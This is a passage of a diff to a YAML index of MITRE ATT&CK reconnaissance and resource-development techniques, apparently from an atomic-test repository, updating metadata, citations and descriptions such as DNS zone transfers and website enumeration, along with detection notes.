         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -60774,7 +61444,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -60793,15 +61463,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -60809,19 +61477,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -60855,55 +61523,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -60928,7 +61605,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -60944,8 +61621,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -60967,7 +61642,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -60983,8 +61658,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -61012,7 +61685,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -61028,33 +61701,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -61068,18 +61741,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -61100,7 +61784,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -61116,39 +61800,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -61156,13 +61838,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -61187,7 +61897,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -61203,8 +61913,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -61226,7 +61934,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -61242,8 +61950,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -61269,7 +61975,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -61287,13 +61993,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -61349,7 +62053,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -61400,7 +62104,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -61421,7 +62124,7 @@ reconnaissance:
